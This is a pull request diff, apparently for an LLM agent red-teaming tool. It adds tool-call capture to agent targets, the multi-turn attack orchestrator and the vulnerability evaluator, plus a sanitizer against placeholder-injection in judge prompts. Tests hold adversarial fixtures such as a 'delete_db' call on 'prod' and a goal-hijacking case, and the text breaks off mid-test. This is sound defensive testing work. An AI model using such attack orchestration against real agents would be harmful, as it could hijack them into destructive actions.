### PR TITLE
feat(evaluatorq): add tool call interception to AgentTarget protocol output (RES-651)

### DIFF
--- a/packages/evaluatorq-py/src/evaluatorq/integrations/langgraph_integration/target.py
+++ b/packages/evaluatorq-py/src/evaluatorq/integrations/langgraph_integration/target.py
@@ -9,7 +9,7 @@ from langchain_core.runnables import RunnableConfig
 from langgraph.graph.state import CompiledStateGraph
 
 from evaluatorq.redteam.backends.base import AgentTarget
-from evaluatorq.redteam.contracts import AgentContext, MemoryStoreInfo, ToolInfo
+from evaluatorq.redteam.contracts import AgentContext, AgentResponse, ExecutedToolCall, MemoryStoreInfo, ToolInfo
 
 
 class LangGraphTarget(AgentTarget):
@@ -70,8 +70,8 @@ class LangGraphTarget(AgentTarget):
             },
         )
 
-    async def send_prompt(self, prompt: str) -> str:
-        """Send a prompt to the LangGraph agent and return its text response."""
+    async def send_prompt(self, prompt: str) -> AgentResponse:
+        """Send a prompt to the LangGraph agent and return its response with tool calls."""
         result = await self._graph.ainvoke(
             {"messages": [{"role": "user", "content": prompt}]},
             config=self._build_config(),
@@ -96,7 +96,24 @@ class LangGraphTarget(AgentTarget):
             content = getattr(last, "content", "")
         if not isinstance(content, str):
             content = str(content)
-        return content
+
+        # Extract tool calls from all AI messages in the state
+        tool_calls: list[ExecutedToolCall] = []
+        for msg in messages:
+            if isinstance(msg, dict):
+                if msg.get("role") == "assistant":
+                    for tc in (msg.get("tool_calls") or []):
+                        name = tc.get("name", "") if isinstance(tc, dict) else getattr(tc, "name", "")
+                        args = tc.get("args", {}) if isinstance(tc, dict) else getattr(tc, "args", {})
+                        tool_calls.append(ExecutedToolCall(name=str(name), arguments=args if isinstance(args, dict) else {}))
+            else:
+                # LangChain AIMessage — tool_calls is a list of dicts with 'name' and 'args'
+                for tc in (getattr(msg, "tool_calls", None) or []):
+                    name = tc.get("name", "") if isinstance(tc, dict) else getattr(tc, "name", "")
+                    args = tc.get("args", {}) if isinstance(tc, dict) else getattr(tc, "args", {})
+                    tool_calls.append(ExecutedToolCall(name=str(name), arguments=args if isinstance(args, dict) else {}))
+
+        return AgentResponse(text=content, tool_calls=tool_calls)
 
     def reset_conversation(self) -> None:
         """Reset conversation state. Thread ID is fixed at construction; clone() provides isolation."""

--- a/packages/evaluatorq-py/src/evaluatorq/integrations/openai_agents_integration/target.py
+++ b/packages/evaluatorq-py/src/evaluatorq/integrations/openai_agents_integration/target.py
@@ -2,12 +2,13 @@
 
 from __future__ import annotations
 
+import json
 from typing import Any
 
 from agents import Agent, Runner
 
 from evaluatorq.redteam.backends.base import AgentTarget
-from evaluatorq.redteam.contracts import AgentContext, ToolInfo
+from evaluatorq.redteam.contracts import AgentContext, AgentResponse, ExecutedToolCall, ToolInfo
 
 
 class OpenAIAgentTarget(AgentTarget):
@@ -41,9 +42,10 @@ class OpenAIAgentTarget(AgentTarget):
         self._run_kwargs = run_kwargs or {}
         self._history: list[Any] = []
 
-    async def send_prompt(self, prompt: str) -> str:
-        """Send a prompt to the agent and return its text response."""
+    async def send_prompt(self, prompt: str) -> AgentResponse:
+        """Send a prompt to the agent and return its response with tool calls."""
         input_data: str | list[Any] = prompt
+        prev_len = len(self._history)
         if self._history:
             input_data = [*self._history, {"role": "user", "content": prompt}]
 
@@ -61,7 +63,24 @@ class OpenAIAgentTarget(AgentTarget):
             )
 
         self._history = result.to_input_list()
-        return str(result.final_output)
+
+        # Extract tool calls only from items added in this turn (not accumulated history)
+        # prev_len items were present before this call; everything after is new
+        tool_calls: list[ExecutedToolCall] = []
+        for item in self._history[prev_len:]:
+            if isinstance(item, dict) and item.get("role") == "assistant":
+                for tc in (item.get("tool_calls") or []):
+                    if isinstance(tc, dict):
+                        func = tc.get("function", {})
+                        name = func.get("name", "") if isinstance(func, dict) else ""
+                        args_str = func.get("arguments", "{}") if isinstance(func, dict) else "{}"
+                        try:
+                            args = json.loads(args_str)
+                        except (json.JSONDecodeError, ValueError):
+                            args = {"raw": args_str}
+                        tool_calls.append(ExecutedToolCall(name=name, arguments=args))
+
+        return AgentResponse(text=str(result.final_output), tool_calls=tool_calls)
 
     def reset_conversation(self) -> None:
         """Reset conversation state by clearing the message history."""

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/__init__.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/__init__.py
@@ -52,6 +52,8 @@ from evaluatorq.redteam.contracts import (
     Framework,
     FrameworkSummary,
     FunctionCall,
+    AgentResponse,
+    ExecutedToolCall,
     JobOutputPayload,
     KnowledgeBaseInfo,
     MemoryStoreInfo,
@@ -170,6 +172,8 @@ __all__ = [
     "AttackStrategy",
     "AttackInfo",
     # Result models
+    "AgentResponse",
+    "ExecutedToolCall",
     "OrchestratorResult",
     "AttackEvaluationResult",
     "UnifiedEvaluationResult",

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/adaptive/evaluator.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/adaptive/evaluator.py
@@ -13,7 +13,7 @@ from openai.types.chat import ChatCompletionMessageParam
 
 from evaluatorq.redteam.backends.registry import create_async_llm_client
 from evaluatorq.redteam.frameworks.owasp.evaluators import get_evaluator_for_category, get_evaluator_for_vulnerability
-from evaluatorq.redteam.contracts import DEFAULT_PIPELINE_MODEL, AttackEvaluationResult, TokenUsage, Vulnerability
+from evaluatorq.redteam.contracts import DEFAULT_PIPELINE_MODEL, AttackEvaluationResult, ExecutedToolCall, TokenUsage, Vulnerability
 from evaluatorq.redteam.tracing import record_llm_response, with_llm_span
 from evaluatorq.redteam.vulnerability_registry import resolve_category_safe
 
@@ -50,6 +50,7 @@ class OWASPEvaluator:
         vuln: Vulnerability,
         messages: list[dict[str, Any]] | list[Message],
         response: str,
+        tool_calls: list[ExecutedToolCall] | None = None,
     ) -> AttackEvaluationResult:
         """Evaluate an agent response for a specific vulnerability.
 
@@ -72,6 +73,7 @@ class OWASPEvaluator:
             evaluator_id=vuln.value,
             messages=messages,
             response=response,
+            tool_calls=tool_calls,
             span_attributes={
                 "orq.redteam.llm_purpose": "evaluation",
                 "orq.redteam.vulnerability": vuln.value,
@@ -83,6 +85,7 @@ class OWASPEvaluator:
         category: str,
         messages: list[dict[str, Any]] | list[Message],
         response: str,
+        tool_calls: list[ExecutedToolCall] | None = None,
     ) -> AttackEvaluationResult:
         """Evaluate an agent response for vulnerability.
 
@@ -94,7 +97,7 @@ class OWASPEvaluator:
 
         vuln = resolve_category_safe(category_code)
         if vuln is not None:
-            return await self.evaluate_vulnerability(vuln, messages, response)
+            return await self.evaluate_vulnerability(vuln, messages, response, tool_calls=tool_calls)
 
         # Fallback: category not in the registry — try the category-keyed lookup directly
         evaluator = get_evaluator_for_category(category, model_id=self.evaluator_model)
@@ -112,6 +115,7 @@ class OWASPEvaluator:
             evaluator_id=category_code,
             messages=messages,
             response=response,
+            tool_calls=tool_calls,
             span_attributes={
                 "orq.redteam.llm_purpose": "evaluation",
                 "orq.redteam.category": category,
@@ -126,13 +130,23 @@ class OWASPEvaluator:
         messages: list[dict[str, Any]] | list[Message],
         response: str,
         span_attributes: dict[str, str],
+        tool_calls: list[ExecutedToolCall] | None = None,
     ) -> AttackEvaluationResult:
         """Execute an evaluator entity against a conversation and return a typed result."""
         try:
             prompt = evaluator.prompt
-            # Replace {{input.all_messages}} BEFORE inserting the untrusted response so that
-            # a crafted response containing "{{input.all_messages}}" cannot expand the template.
+            # Replace template variables in a safe order. Trusted internal data first,
+            # then adversary-controlled values last so no later substitution can re-expand them.
+            # Tool call data (names, arguments) is adversary-influenced and is sanitized with
+            # _sanitize_placeholders before embedding to prevent cross-expansion attacks.
             prompt = prompt.replace('{{input.all_messages}}', json.dumps(_serialize_messages(messages), indent=2))
+            prompt = prompt.replace(
+                '{{output.tool_calls}}',
+                _sanitize_placeholders(json.dumps(
+                    [{'name': tc.name, 'arguments': tc.arguments, 'result': tc.result} for tc in (tool_calls or [])],
+                    indent=2,
+                )),
+            )
             prompt = prompt.replace('{{output.response}}', response or '')
 
             eval_messages: list[ChatCompletionMessageParam] = [
@@ -195,6 +209,7 @@ async def evaluate_attack(
     evaluator_model: str = DEFAULT_PIPELINE_MODEL,
     *,
     vulnerability: Vulnerability | None = None,
+    tool_calls: list[ExecutedToolCall] | None = None,
 ) -> AttackEvaluationResult:
     """Convenience function to evaluate a single attack.
 
@@ -203,8 +218,8 @@ async def evaluate_attack(
     """
     evaluator = OWASPEvaluator(evaluator_model=evaluator_model)
     if vulnerability is not None:
-        return await evaluator.evaluate_vulnerability(vulnerability, messages, response)
-    return await evaluator.evaluate(category, messages, response)
+        return await evaluator.evaluate_vulnerability(vulnerability, messages, response, tool_calls=tool_calls)
+    return await evaluator.evaluate(category, messages, response, tool_calls=tool_calls)
 
 
 def _serialize_messages(messages: list[dict[str, Any]] | list[Message]) -> list[dict[str, Any]]:
@@ -216,5 +231,15 @@ def _serialize_messages(messages: list[dict[str, Any]] | list[Message]) -> list[
             continue
         serialized.append({'role': str(msg.role), 'content': str(msg.content or '')})
     return serialized
+
+
+def _sanitize_placeholders(text: str) -> str:
+    """Neutralize template placeholder markers in adversary-controlled content.
+
+    Replaces ``{{`` with ``{ {`` so that crafted tool call names or argument values
+    containing placeholder strings (e.g. ``{{output.response}}``) cannot be expanded
+    by a subsequent ``.replace()`` call in the evaluator prompt pipeline.
+    """
+    return text.replace('{{', '{ {')
 
 

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/adaptive/orchestrator.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/adaptive/orchestrator.py
@@ -18,11 +18,12 @@ from openai.types.chat import ChatCompletionMessageParam
 from rich.console import Console
 from rich.progress import BarColumn, Progress, SpinnerColumn, TaskID, TextColumn, TimeElapsedColumn
 
-from evaluatorq.redteam.backends.base import AgentTarget, DefaultErrorMapper, ErrorMapper
+from evaluatorq.redteam.backends.base import AgentTarget, DefaultErrorMapper, ErrorMapper, _coerce_to_agent_response
 from evaluatorq.redteam.contracts import (
     DEFAULT_PIPELINE_MODEL, PIPELINE_CONFIG,
     AgentContext,
     AttackStrategy,
+    ExecutedToolCall,
     Message,
     OrchestratorResult,
     TokenUsage,
@@ -412,6 +413,7 @@ class MultiTurnOrchestrator:
 
         # Agent conversation (what we'll return)
         conversation: list[Message] = []
+        tool_calls_per_turn: list[list[ExecutedToolCall]] = []
 
         objective_achieved = False
         final_response = ''
@@ -615,10 +617,14 @@ class MultiTurnOrchestrator:
                                 "orq.redteam.input": attack_prompt,
                             },
                         ) as tgt_span:
-                            agent_response = await asyncio.wait_for(
+                            raw_response = await asyncio.wait_for(
                                 target.send_prompt(attack_prompt),
                                 timeout=target_timeout_s,
                             )
+                            # Option A backward-compat: wrap str returns into AgentResponse
+                            agent_response_obj = _coerce_to_agent_response(raw_response)
+                            agent_response = agent_response_obj.text
+                            tool_calls_per_turn.append(agent_response_obj.tool_calls)
                             final_response = agent_response
                             consecutive_agent_errors = 0
                             set_span_attrs(tgt_span, {
@@ -650,6 +656,7 @@ class MultiTurnOrchestrator:
                                 'consecutive_errors': consecutive_agent_errors,
                             }
                             error_turn = turn + 1
+                            tool_calls_per_turn.append([])
                             conversation.extend([
                                 Message(role='user', content=attack_prompt),
                                 Message(role='assistant', content=agent_response),
@@ -683,6 +690,7 @@ class MultiTurnOrchestrator:
                             }
                             error_code = mapped_code
                             error_turn = turn + 1
+                            tool_calls_per_turn.append([])
                             conversation.extend([
                                 Message(role='user', content=attack_prompt),
                                 Message(role='assistant', content=agent_response),
@@ -696,7 +704,10 @@ class MultiTurnOrchestrator:
                             })
                             break
 
-                    # Record conversation
+                    # Record conversation (success path — tool_calls already appended in success block above;
+                    # error paths that reach here had consecutive_agent_errors < 2, append empty list)
+                    if len(tool_calls_per_turn) < len(conversation) // 2 + 1:
+                        tool_calls_per_turn.append([])
                     conversation.extend([
                         Message(role='user', content=attack_prompt),
                         Message(role='assistant', content=agent_response),
@@ -788,4 +799,5 @@ class MultiTurnOrchestrator:
             error_details=error_details,
             error_turn=error_turn,
             truncated_turns=truncation_warnings,
+            tool_calls_per_turn=tool_calls_per_turn,
         )

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/adaptive/pipeline.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/adaptive/pipeline.py
@@ -21,7 +21,7 @@ from evaluatorq import DataPoint, EvaluationResult, Job, job
 from loguru import logger
 
 from evaluatorq.redteam.adaptive.attack_generator import generate_attack_prompt, generate_objective
-from evaluatorq.redteam.backends.base import DefaultErrorMapper
+from evaluatorq.redteam.backends.base import DefaultErrorMapper, _coerce_to_agent_response
 from evaluatorq.redteam.backends.registry import create_async_llm_client, resolve_backend
 from evaluatorq.redteam.adaptive.evaluator import OWASPEvaluator
 from evaluatorq.redteam.contracts import DEFAULT_PIPELINE_MODEL, PIPELINE_CONFIG, AttackOutput, AttackStrategy, EvaluatorConfig, Message, OrchestratorResult, TokenUsage, Vulnerability
@@ -330,10 +330,12 @@ def create_dynamic_redteam_job(
                             "orq.redteam.input": prompt,
                         },
                     ) as tgt_span:
-                        response = await asyncio.wait_for(
+                        raw = await asyncio.wait_for(
                             target.send_prompt(prompt),
                             timeout=target_timeout_s,
                         )
+                        agent_resp = _coerce_to_agent_response(raw)
+                        response = agent_resp.text
                         set_span_attrs(tgt_span, {
                             "output": response or "",
                             "orq.redteam.output": response or "",

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/backends/base.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/backends/base.py
@@ -9,12 +9,12 @@ from __future__ import annotations
 
 import re
 from dataclasses import dataclass
-from typing import TYPE_CHECKING, Protocol, cast
+from typing import TYPE_CHECKING, Any, Protocol, cast
 
 from loguru import logger
 
 if TYPE_CHECKING:
-    from evaluatorq.redteam.contracts import AgentContext, TokenUsage
+    from evaluatorq.redteam.contracts import AgentContext, AgentResponse, TokenUsage
 
 
 class AgentTarget(Protocol):
@@ -29,13 +29,25 @@ class AgentTarget(Protocol):
 
     memory_entity_id: str | None
 
-    async def send_prompt(self, prompt: str) -> str:
-        """Send a prompt and return the response."""
+    async def send_prompt(self, prompt: str) -> 'AgentResponse':
+        """Send a prompt and return a structured response with text and any tool calls made."""
         ...
 
     def reset_conversation(self) -> None:
         """Reset conversation state for a new attack."""
         ...
+
+
+def _coerce_to_agent_response(raw: Any) -> 'AgentResponse':
+    """Wrap a plain str return into AgentResponse for backward-compat with legacy targets.
+
+    Any target that still returns ``str`` from ``send_prompt`` will be transparently
+    wrapped here at the orchestrator call site (Option A backward-compat strategy).
+    """
+    from evaluatorq.redteam.contracts import AgentResponse
+    if isinstance(raw, AgentResponse):
+        return raw
+    return AgentResponse(text=str(raw) if raw is not None else '')
 
 
 class SupportsClone(Protocol):

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/backends/openai.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/backends/openai.py
@@ -2,13 +2,14 @@
 
 from __future__ import annotations
 
+import json
 from typing import TYPE_CHECKING, Any
 
 from loguru import logger
 from openai.types.chat import ChatCompletionMessageParam
 
 from evaluatorq.redteam.backends.base import extract_provider_error_code, extract_status_code
-from evaluatorq.redteam.contracts import AgentContext, TargetKind, TokenUsage
+from evaluatorq.redteam.contracts import AgentContext, AgentResponse, ExecutedToolCall, TargetKind, TokenUsage
 from evaluatorq.redteam.tracing import record_llm_response, with_llm_span
 
 if TYPE_CHECKING:
@@ -33,8 +34,8 @@ class OpenAIModelTarget:
         self.system_prompt = system_prompt or 'You are a helpful assistant.'
         self._last_token_usage: TokenUsage | None = None
 
-    async def send_prompt(self, prompt: str) -> str:
-        """Send a prompt to the OpenAI model and return its response."""
+    async def send_prompt(self, prompt: str) -> AgentResponse:
+        """Send a prompt to the OpenAI model and return its response with any tool calls."""
         messages: list[ChatCompletionMessageParam] = [
             {'role': 'system', 'content': self.system_prompt},
             {'role': 'user', 'content': prompt},
@@ -48,8 +49,18 @@ class OpenAIModelTarget:
                 model=self.model_id,
                 messages=messages,
             )
-            content = response.choices[0].message.content or ''
+            msg = response.choices[0].message
+            content = msg.content or ''
             record_llm_response(span, response, output_content=content)
+
+            # Capture tool calls made by the model
+            executed_tool_calls: list[ExecutedToolCall] = []
+            for tc in (msg.tool_calls or []):
+                try:
+                    args = json.loads(tc.function.arguments) if tc.function.arguments else {}
+                except (json.JSONDecodeError, ValueError):
+                    args = {'raw': tc.function.arguments}
+                executed_tool_calls.append(ExecutedToolCall(name=tc.function.name, arguments=args))
 
             # Store usage for consume_last_token_usage()
             usage = getattr(response, 'usage', None)
@@ -67,7 +78,7 @@ class OpenAIModelTarget:
             else:
                 self._last_token_usage = None
 
-        return content
+        return AgentResponse(text=content, tool_calls=executed_tool_calls)
 
     def consume_last_token_usage(self) -> TokenUsage | None:
         """Return and clear usage from last call."""

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/backends/orq.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/backends/orq.py
@@ -48,6 +48,8 @@ from evaluatorq.redteam.backends.base import extract_provider_error_code, extrac
 from evaluatorq.redteam.contracts import (
     PIPELINE_CONFIG,
     AgentContext,
+    AgentResponse,
+    ExecutedToolCall,
     KnowledgeBaseInfo,
     MemoryStoreInfo,
     TokenUsage,
@@ -88,8 +90,8 @@ class ORQAgentTarget:
         self._task_id: str | None = None
         self._last_token_usage: TokenUsage | None = None
 
-    async def send_prompt(self, prompt: str) -> str:
-        """Send a prompt to the ORQ agent."""
+    async def send_prompt(self, prompt: str) -> AgentResponse:
+        """Send a prompt to the ORQ agent and return its response with any tool calls."""
         async with with_redteam_span(
             f"agent {self.agent_key}",
             {
@@ -162,8 +164,25 @@ class ORQAgentTarget:
                             ids.append(call_id)
                     return ids
 
+                def _extract_executed_tool_calls(resp: object) -> list[ExecutedToolCall]:
+                    """Extract tool calls with name and arguments from a response."""
+                    pending = getattr(resp, 'pending_tool_calls', None) or []
+                    calls: list[ExecutedToolCall] = []
+                    for call in pending:
+                        name = getattr(call, 'name', None) or (call.get('name') if isinstance(call, dict) else None) or ''
+                        args = getattr(call, 'arguments', None) or (call.get('arguments') if isinstance(call, dict) else None) or {}
+                        if isinstance(args, str):
+                            try:
+                                import json as _json
+                                args = _json.loads(args)
+                            except Exception:
+                                args = {'raw': args}
+                        calls.append(ExecutedToolCall(name=str(name), arguments=args if isinstance(args, dict) else {}))
+                    return calls
+
                 _accumulate_usage(response)
                 text_response = _extract_text(response)
+                all_tool_calls: list[ExecutedToolCall] = _extract_executed_tool_calls(response)
 
                 # Some agent tool flows require client-provided tool_result parts.
                 # Continue the same task with synthetic tool results so the thread can progress.
@@ -201,6 +220,7 @@ class ORQAgentTarget:
                     extracted = _extract_text(response)
                     if extracted:
                         text_response = extracted
+                    all_tool_calls.extend(_extract_executed_tool_calls(response))
                     pending_ids = _pending_tool_call_ids(response)
 
                 if pending_ids:
@@ -240,7 +260,7 @@ class ORQAgentTarget:
                         ensure_ascii=False,
                     ),
                 })
-                return result_text
+                return AgentResponse(text=result_text, tool_calls=all_tool_calls)
 
             except Exception as e:
                 logger.error(f'ORQ agent call failed: {e}')

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/contracts.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/contracts.py
@@ -10,6 +10,7 @@ Semantic convention:
 
 import os
 import sys
+from dataclasses import dataclass, field
 from datetime import datetime
 from typing import Any, Literal, TypedDict
 
@@ -343,6 +344,32 @@ class ToolCall(BaseModel):
     id: str = Field(description='Unique tool call ID (e.g., call_abc123)')
     type: Literal['function'] = Field(default='function', description='Tool type')
     function: FunctionCall = Field(description='Function call details')
+
+
+@dataclass
+class ExecutedToolCall:
+    """A tool call captured during agent execution (distinct from ToolCall which is for strategy definitions)."""
+
+    name: str
+    arguments: dict
+    result: str | None = None
+
+
+@dataclass
+class AgentResponse:
+    """Structured response from a target agent, including tool calls made during execution.
+
+    Backward-compatible: evaluators and orchestrator default to ``.text``.
+    Tool-aware components may additionally inspect ``.tool_calls``.
+
+    ``intermediate_steps`` is a hook for framework-specific raw execution data
+    (e.g. LangChain AgentAction/AgentFinish pairs). Not consumed by the orchestrator
+    or evaluator — available for custom backends and post-processing.
+    """
+
+    text: str
+    tool_calls: list[ExecutedToolCall] = field(default_factory=list)
+    intermediate_steps: list[dict[str, Any]] | None = None
 
 
 class Message(BaseModel):
@@ -849,6 +876,10 @@ class OrchestratorResult(BaseModel):
     error_turn: int | None = Field(default=None, description='1-based turn number where the error occurred')
     truncated_turns: list[int] = Field(
         default_factory=list, description='Turn numbers where adversarial LLM hit max_tokens'
+    )
+    tool_calls_per_turn: list[list[ExecutedToolCall]] = Field(
+        default_factory=list,
+        description='Tool calls captured per attack turn (index 0 = turn 1). Empty list per turn if target returned none.',
     )
 
     @property

--- a/packages/evaluatorq-py/src/evaluatorq/redteam/runner.py
+++ b/packages/evaluatorq-py/src/evaluatorq/redteam/runner.py
@@ -46,6 +46,7 @@ from evaluatorq.redteam.backends.base import (
     ErrorMapper,
     MemoryCleanup,
     NoopMemoryCleanup,
+    _coerce_to_agent_response,
     is_agent_target,
 )
 from evaluatorq.redteam.backends.registry import create_async_llm_client, resolve_backend
@@ -1409,7 +1410,8 @@ async def _run_dynamic_or_hybrid(
                                 f'produced an empty prompt ({len(messages)} messages, none with user content).'
                             )
                         target_instance = _factory.create_target(_label)
-                        response = await target_instance.send_prompt(prompt)
+                        raw = await target_instance.send_prompt(prompt)
+                        response = _coerce_to_agent_response(raw).text
                         _active_progress = _get_active_progress()
                         if _active_progress is not None:
                             await _active_progress.finish_attack(None)

--- a/packages/evaluatorq-py/tests/redteam/test_orchestrator.py
+++ b/packages/evaluatorq-py/tests/redteam/test_orchestrator.py
@@ -73,7 +73,7 @@ class TestORQAgentTarget:
             mock_to_thread.return_value = mock_response
             response = await target.send_prompt('Hello')
 
-        assert response == 'Agent response'
+        assert response.text == 'Agent response'
         assert target._task_id == 'task_123'  # pyright: ignore[reportPrivateUsage]
 
     @pytest.mark.asyncio

--- a/packages/evaluatorq-py/tests/redteam/test_vulnerability_first.py
+++ b/packages/evaluatorq-py/tests/redteam/test_vulnerability_first.py
@@ -628,6 +628,7 @@ class TestEvaluatorVulnerabilityFirst:
             Vulnerability.GOAL_HIJACKING,
             [{"role": "user", "content": "test"}],
             "I won't do that.",
+            tool_calls=None,
         )
 
     @pytest.mark.asyncio

--- a/packages/evaluatorq-py/tests/unit/test_langgraph_target.py
+++ b/packages/evaluatorq-py/tests/unit/test_langgraph_target.py
@@ -9,6 +9,7 @@ import pytest
 pytest.importorskip("langgraph")
 
 from evaluatorq.integrations.langgraph_integration import LangGraphTarget  # noqa: E402
+from evaluatorq.redteam.contracts import AgentResponse  # noqa: E402
 
 
 def _make_graph(response_content: str = "I'm fine") -> MagicMock:
@@ -26,7 +27,8 @@ class TestLangGraphTarget:
         graph = _make_graph("hello back")
         target = LangGraphTarget(graph)
         result = await target.send_prompt("hello")
-        assert result == "hello back"
+        assert isinstance(result, AgentResponse)
+        assert result.text == "hello back"
 
     @pytest.mark.asyncio
     async def test_send_prompt_passes_user_message(self) -> None:
@@ -90,7 +92,7 @@ class TestLangGraphTarget:
         )
         target = LangGraphTarget(graph)
         result = await target.send_prompt("hi")
-        assert result == "dict msg"
+        assert result.text == "dict msg"
 
     def test_clone_returns_independent_instance(self) -> None:
         graph = _make_graph()
@@ -129,8 +131,8 @@ class TestLangGraphTarget:
         graph.ainvoke = AsyncMock(return_value={"messages": [msg]})
         target = LangGraphTarget(graph)
         result = await target.send_prompt("hi")
-        assert isinstance(result, str)
-        assert "multimodal content" in result
+        assert isinstance(result.text, str)
+        assert "multimodal content" in result.text
 
 
 class TestLangGraphTargetAgentContext:

--- a/packages/evaluatorq-py/tests/unit/test_openai_agents_target.py
+++ b/packages/evaluatorq-py/tests/unit/test_openai_agents_target.py
@@ -9,6 +9,7 @@ import pytest
 pytest.importorskip("agents")
 
 from evaluatorq.integrations.openai_agents_integration import OpenAIAgentTarget  # noqa: E402
+from evaluatorq.redteam.contracts import AgentResponse  # noqa: E402
 
 
 def _mock_runner_and_result(output: str = "response") -> tuple[MagicMock, MagicMock]:
@@ -31,7 +32,8 @@ class TestOpenAIAgentTarget:
 
         target = OpenAIAgentTarget(MagicMock())
         response = await target.send_prompt("hello")
-        assert response == "hello back"
+        assert isinstance(response, AgentResponse)
+        assert response.text == "hello back"
 
     @pytest.mark.asyncio
     async def test_first_prompt_sends_string(self, monkeypatch: pytest.MonkeyPatch) -> None:
@@ -169,7 +171,7 @@ class TestOpenAIAgentTarget:
 
         target = OpenAIAgentTarget(MagicMock())
         r1 = await target.send_prompt("Hello")
-        assert r1 == "Reply 1"
+        assert r1.text == "Reply 1"
         r2 = await target.send_prompt("Follow up")
-        assert r2 == "Reply 2"
+        assert r2.text == "Reply 2"
         assert len(target._history) > 2

--- a/packages/evaluatorq-py/tests/unit/test_tool_call_interception.py
+++ b/packages/evaluatorq-py/tests/unit/test_tool_call_interception.py
@@ -1,0 +1,359 @@
+"""Unit tests for tool call interception — AgentResponse, ExecutedToolCall, coercion, and evaluator."""
+
+from __future__ import annotations
+
+import json
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from evaluatorq.redteam.backends.base import _coerce_to_agent_response
+from evaluatorq.redteam.contracts import AgentResponse, ExecutedToolCall, OrchestratorResult, Message
+from evaluatorq.redteam.adaptive.evaluator import _sanitize_placeholders, _serialize_messages
+
+
+# ---------------------------------------------------------------------------
+# _coerce_to_agent_response
+# ---------------------------------------------------------------------------
+
+class TestCoerceToAgentResponse:
+    def test_str_input_wraps_to_agent_response(self) -> None:
+        result = _coerce_to_agent_response("hello")
+        assert isinstance(result, AgentResponse)
+        assert result.text == "hello"
+        assert result.tool_calls == []
+
+    def test_agent_response_input_returned_unchanged(self) -> None:
+        tc = ExecutedToolCall(name="foo", arguments={"x": 1})
+        original = AgentResponse(text="hi", tool_calls=[tc])
+        result = _coerce_to_agent_response(original)
+        assert result is original
+
+    def test_none_input_produces_empty_text(self) -> None:
+        result = _coerce_to_agent_response(None)
+        assert isinstance(result, AgentResponse)
+        assert result.text == ""
+        assert result.tool_calls == []
+
+    def test_empty_string_input(self) -> None:
+        result = _coerce_to_agent_response("")
+        assert result.text == ""
+
+
+# ---------------------------------------------------------------------------
+# ExecutedToolCall
+# ---------------------------------------------------------------------------
+
+class TestExecutedToolCall:
+    def test_default_result_is_none(self) -> None:
+        tc = ExecutedToolCall(name="my_tool", arguments={"key": "value"})
+        assert tc.result is None
+
+    def test_with_result(self) -> None:
+        tc = ExecutedToolCall(name="my_tool", arguments={}, result="tool output")
+        assert tc.result == "tool output"
+
+    def test_empty_arguments(self) -> None:
+        tc = ExecutedToolCall(name="no_args", arguments={})
+        assert tc.arguments == {}
+
+
+# ---------------------------------------------------------------------------
+# OrchestratorResult tool_calls_per_turn
+# ---------------------------------------------------------------------------
+
+class TestOrchestratorResultToolCalls:
+    def test_default_tool_calls_per_turn_is_empty(self) -> None:
+        result = OrchestratorResult(
+            conversation=[],
+            turns=0,
+        )
+        assert result.tool_calls_per_turn == []
+
+    def test_tool_calls_per_turn_stored(self) -> None:
+        tc = ExecutedToolCall(name="delete_db", arguments={"db": "prod"})
+        result = OrchestratorResult(
+            conversation=[
+                Message(role="user", content="do it"),
+                Message(role="assistant", content="done"),
+            ],
+            turns=1,
+            tool_calls_per_turn=[[tc]],
+        )
+        assert len(result.tool_calls_per_turn) == 1
+        assert result.tool_calls_per_turn[0][0].name == "delete_db"
+
+    def test_tool_calls_per_turn_empty_turn(self) -> None:
+        result = OrchestratorResult(
+            conversation=[
+                Message(role="user", content="hi"),
+                Message(role="assistant", content="hello"),
+            ],
+            turns=1,
+            tool_calls_per_turn=[[]],
+        )
+        assert result.tool_calls_per_turn == [[]]
+
+
+# ---------------------------------------------------------------------------
+# _sanitize_placeholders
+# ---------------------------------------------------------------------------
+
+class TestSanitizePlaceholders:
+    def test_neutralizes_template_placeholder(self) -> None:
+        text = '{"name": "{{output.response}}", "args": {}}'
+        sanitized = _sanitize_placeholders(text)
+        assert "{{output.response}}" not in sanitized
+        assert "{ {output.response}}" in sanitized
+
+    def test_neutralizes_all_messages_placeholder(self) -> None:
+        text = '{"note": "{{input.all_messages}}"}'
+        sanitized = _sanitize_placeholders(text)
+        assert "{{input.all_messages}}" not in sanitized
+
+    def test_clean_text_unchanged(self) -> None:
+        text = '{"name": "safe_tool", "arguments": {"key": "value"}}'
+        assert _sanitize_placeholders(text) == text
+
+    def test_tool_calls_json_is_sanitized_before_injection(self) -> None:
+        """Verify adversarial tool call name cannot cause cross-expansion in evaluator prompt."""
+        tc = ExecutedToolCall(name="{{output.response}}", arguments={})
+        serialized = json.dumps(
+            [{'name': tc.name, 'arguments': tc.arguments, 'result': tc.result}],
+            indent=2,
+        )
+        sanitized = _sanitize_placeholders(serialized)
+        # After sanitization, the remaining .replace('{{output.response}}', ...) call
+        # will NOT match because the {{ has been broken
+        assert "{{output.response}}" not in sanitized
+
+
+# ---------------------------------------------------------------------------
+# Evaluator {{output.tool_calls}} substitution
+# ---------------------------------------------------------------------------
+
+class TestEvaluatorToolCallsSubstitution:
+    @pytest.mark.asyncio
+    async def test_empty_tool_calls_renders_empty_json_array(self) -> None:
+        from evaluatorq.redteam.adaptive.evaluator import OWASPEvaluator
+        evaluator = OWASPEvaluator.__new__(OWASPEvaluator)
+        evaluator.evaluator_model = "test-model"
+        evaluator.llm_kwargs = {}
+
+        captured_prompt: list[str] = []
+
+        mock_response = MagicMock()
+        mock_response.choices[0].message.content = '{"value": true, "explanation": "ok"}'
+        mock_response.usage = None
+
+        async def fake_create(**kwargs):
